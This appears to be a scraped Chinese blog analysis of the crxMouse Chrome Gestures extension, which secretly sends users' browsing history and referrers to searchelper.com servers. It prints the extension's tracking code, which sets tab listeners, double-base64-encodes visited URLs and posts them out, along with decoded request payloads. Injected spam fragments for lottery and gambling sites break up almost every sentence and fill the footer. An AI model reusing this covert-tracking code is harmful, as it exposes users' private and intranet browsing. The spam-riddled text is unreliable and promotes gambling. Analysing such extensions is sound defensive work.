IT技術互動交流平台

小心瀏覽器插件竊取你的隱私

作者|-118彩票下载安装:佚名  發布日期|--湖南特岗计划信息管理系统:2016-08-02 21:13:28

 瀏覽器插件已經成為了瀏覽器的必備品|-天天网化妆品,但是市場上的插件也良莠不齊|__106官网彩票安全吗,甚至部分插件切換用戶隱私-||黄江小顺车行,如瀏覽器的曆史記錄|hp5100se驱动下载。筆者就遇到了這樣一個插件_--娱乐天地视频,就是著名的手勢插件_|_永胜国际快彩:crxMouse Chrome Gestures_-_038彩票网站,更可氣的是已經用了這個插件一年多了-_和龙政务信息网。

1 簡單介紹_-绝配冤家:

   用Google搜索crxMouse Chrome Gestures導向到google市場_|黄龙云简历,可以看到這款插件的簡單介紹|山东高考人数。

   原名:Gestures for Chrome(TM)漢化版.方便,快捷,充分發掘鼠標的所有操作.功能包括:鼠標手勢,超級拖曳,滾輪手勢,搖杆手勢,平滑滾動,標簽頁列表等. 本擴展致力於通過鼠標來實現一些功能操作,充分挖掘鼠標的所有操作.

   功能包括:鼠標手勢,超級拖曳,滾輪手勢,搖杆手勢,平滑滾動,標簽頁列表等

   目前在google市場上這款插件有30萬的用戶--非主流苛苛服饰,累計評價5000_320彩票,其中很大一部分是國內用戶|||林志炫北京演唱会,影響還是非常廣泛的_|2019年69期出什么马。

   google市場

2 驗證竊取行為

   通過wireshark抓包可以看到兩個分別發送到s808.searchelper.com和s1808.searchelper.com的請求-|_istoway,直接上圖_-雅虎宝贝鱼翻译:

   s808服務請求

   從origin可以看出_-_艾艾社区,請求是來源於瀏覽器插件|-手机2009qq,標記為|-_天目手机维修论坛:jgiplclhploodgnkcljjgddajfbmafmp--_勇者斗恶龙怪兽篇金手指,可以通過chrome的chrome://extensions/找到該id對應的插件|-|大庆羽毛球网,就是插件顯示-_|芝麻街跑法,其對應的係統目錄為

   

C:Users[用戶]AppDataLocalGoogleChromeUser DataDefaultExtensionsjgiplclhploodgnkcljjgddajfbmafmp

   

   我們可以通過分析其代碼發現其實現__金立gn380刷机,這個後續再講|_青海明胶股票。細心的讀者可能會看到post請求段被加密了--湖南经视午间新闻,看結構像是base64|||诺曼琦官方网站专卖店,嚐試用base64解碼-舒南,還是base64編碼格式|_致富彩票是骗局吗,再次解碼-|芒果二手车,得到如下數據-_功夫周星驰国语:

   

s=808&md=21&pid=SjOa3PgqWSHYapU&sess=314039255259558500&q=http://bbs.pediy.com/showthread.php?
t=179524&prev=http://bbs.pediy.com/forumdisplay.php?f=161&link=1&sub=chrome&hreferer=http://bbs.pediy.com/forumdisplay.php?
f=161&tmv=3015

   

   s=808就代表著服務器s808,pid即userid||-贺岁电影,sess是用戶本地標記session||仲博彩票手机客户端app,sub代表著瀏覽器類型-|永盛国际提款安全吗?,q代表當前頁麵李白谈爱原文,prev代表著從哪個頁麵過來_-至诚证券,也就是referer的作用_106官网彩票所有苹果版,hreferer就也記錄著referer字段有了這些數據就可以分析用戶行為-|_东四命,可以供搜索引擎-_-妖精的尾巴421,其實百度統計和google統計也是幹同樣的事-_13年国庆放假安排,甚至百度統計還有點擊等的統計-__沈绛红。就這樣你的瀏覽行為被發送給了其他服務器--至尊彩合法吗,這不是最危險的___歌手2017第三期排名,最危險的是你在瀏覽內網的一些頁麵也會被發送出去--|赢咖娱乐稳定吗,內網的一些站點就很容易被泄露了||大象网直播。

   接著我們看另外一個請求__078彩票正规吗,這個請求是發送到s1808服務器上--|众赢彩票新3D,具體請求如下||_01彩票网址:

   s1808服務器的請求

   解密加密後的內容和發送到s808的請求基本一致|-苏州联建,具體如下_365赌博靠谱吗:

   

s=1808&md=21&pid=SjOa3PgqWSHYapU&sess=765877789119258500&sub=chrome&q=http%3A//bbs.pediy.com/showthread.php%3Ft%
3D179524&hreferer=http%3A//bbs.pediy.com/forumdisplay.php%3Ff%3D161&prev=http%3A//bbs.pediy.com/forumdisplay.php%3Ff%
3D161&tmv=4015&tmf=1

   

   這裏就有點搞不太清楚發這樣一個備份請求的原因了|-好看的科幻电影推荐,難道僅僅是備份__-掌上彩票安卓版,有待思考|||大象网,為了更好的弄清楚該插件還有沒有其他危險行為_||东环广场电影院,接下來我們分析插件的實現__永胜集团充钱。

3 惡意插件實現

   插件的惡意行為集中在upalytics_ch.js代碼中|||360彩票注册送50元,安裝後的初始化代碼|-优彩网址:

   

this.initOnceAfterInstall = function() {
    if (!utils.db.get("userid")) {
        var id = utils.createUserID();
        utils.db.set("userid", id)
    }
    if (!utils.db.get("install_time")) {
        var now = (new Date).getTime() / 1E3;
        utils.db.set("install_time", now)
    }
    if (!utils.db_type.get("tmv")) {
        var now = (new Date).getTime() / 1E3;
        utils.db_type.set("tmv", SIM_ModuleConstants._TMV);
    }
};

   

   在初始化中生成userid_||强心脏20110823,獲取install_time_|河北区haobc,twv字段存放在本地localstorage中|__闻一多的故事,接著會創建各種調用addListener接口來創建監聽器_2018高考最高分是谁,當tab頁更新__360彩票官网百度,替換___1990娱乐彩票,激活的時候就會調用相應的請求發送相應的函數_锦旗格式,extension_onRequest則是發送到s808服務器--|汤镇宗老婆张丽霞,tabs_onUpdated,tabs_onActivated,tabs_onReplaced則是發送請求到s1808服務器|-安达舞子,具體代碼如下||黄梁txt:

   

this.start = function() {
    try {
        chrome.extension.onRequest.addListener(extension_onRequest);
        chrome.tabs.onUpdated.addListener(tabs_onUpdated);
        chrome.tabs.onActivated.addListener(tabs_onActivated);
        chrome.tabs.onReplaced.addListener(tabs_onReplaced)
    } catch (e) {
        log.SEVERE("8835", e)
    }
}

 

   

   下麵我們簡單分析下發送到s808.searchelper.com的related請求的代碼-179彩票,已簡化|_|优博博彩,簡化部分主要是去除一些google搜索的跳轉_-认识国旗,去除docType非html類型的_||阜新红茶馆,去除間隔時間很短的||月城瑞妮在线。

   

function extension_onRequest(request, sender, sendResponse) {
    var prev_state = tabs_states[tabId];
    tabs_states[tabId] = change_status;
    if (res_prev_url == tab_url && prev_state != change_status){
        log.ERROR("ERROR 8002 ??");
        return
    }
    if(res_prev_url == null || res_prev_url.length == 0) {
        res_prev_url = last_prev;
    }
    last_prev = tab_url;
    var data = "s=" + SIM_Config_BG.getSourceId() + "&md=21&pid=" + utils.db.get("userid") + "&sess=" + SIM_Session.getSessionId() + "&q=" + encodeURIComponent(tab_url) + "&prev=" + encodeURIComponent(res_prev_url) + "&link=" + (ref ? "1" : "0") + "&sub=" + SIM_ModuleConstants.BROWSER + "&hreferer=" + encodeURIComponent(ref);
    data = data + "&tmv=" + SIM_ModuleConstants._TMV;
    data = SIM_Base64.encode(SIM_Base64.encode(data));
    data = "e=" + data;
    var url = utils.db_type.get("server") + "/related";

    utils.net.post(url, "json", data, function(result) {
            log.INFO("Succeeded in posting data");
            tabs_prevs[tabId] = tab_url
            }, function(httpCode) {
            log.INFO("Failed to retrieve content. (HTTP Code:" + httpCode.status + ")");
            log.ERROR("ERROR 8004 ??");
            tabs_prevs[tabId] = tab_url
            })
}

   

   從上述代碼中可以看出在關鍵的瀏覽器當前url和referer都進行了兩次base64編碼處理|_-漫画大全之恋母性活,可以逃過一些普通用戶的眼睛||-助赢彩票软件,難道這種方式能夠躲過google的一些自動審查_|众益下载,比較好奇_|武汉艾普宽带。

4 建議

   碼農也不容易__|198平台计划,辛辛苦苦寫出來的程序不賺錢隻能靠竊取用戶瀏覽曆史發給第三方來獲取回報-|-铅球重量,想必也是迫不得已1213金鼎娱乐,當然對於這種竊取隱私的絕對要抵製_|中央6。 mouse guesture作為一個很好用的特性-|英伦国际彩票,筆者已經難以離開_-运盛彩票能提现吗?,所以在google市場上選擇了其他的guesture插件_雍正皇后种田记。有了這個教訓_-诗馨语,相信大家以後使用瀏覽器插件肯定會多長一雙眼睛_-河北省宁晋县郝庄村。

 

Tag標簽陈丽阳: 插件   瀏覽器   隱私  
  • 專題推薦

  • Windows7係統入門 優化 技巧技術專題
  • Windows7係統專題 無論是升級操作係統---潍坊市教育信息港、資料備份|--广州qq女、加強資料的安全及管...... 詳細
About IT165 - 廣告服務 - 隱私聲明 - 版權申明 - 免責條款 - 網站地圖 - 網友投稿 - 聯係方式
本站內容來自於互聯網,僅供用於網絡技術學習,學習中請遵循相關法律法規
北京赛车pk10国民彩票通博彩票pc蛋蛋金牌彩票江苏快三

免责声明: 本站资料及图片来源互联网文章,本网不承担任何由内容信息所引起的争议和法律责任。所有作品版权归原创作者所有,与本站立场无关,如用户分享不慎侵犯了您的权益,请联系我们告知,我们将做删除处理!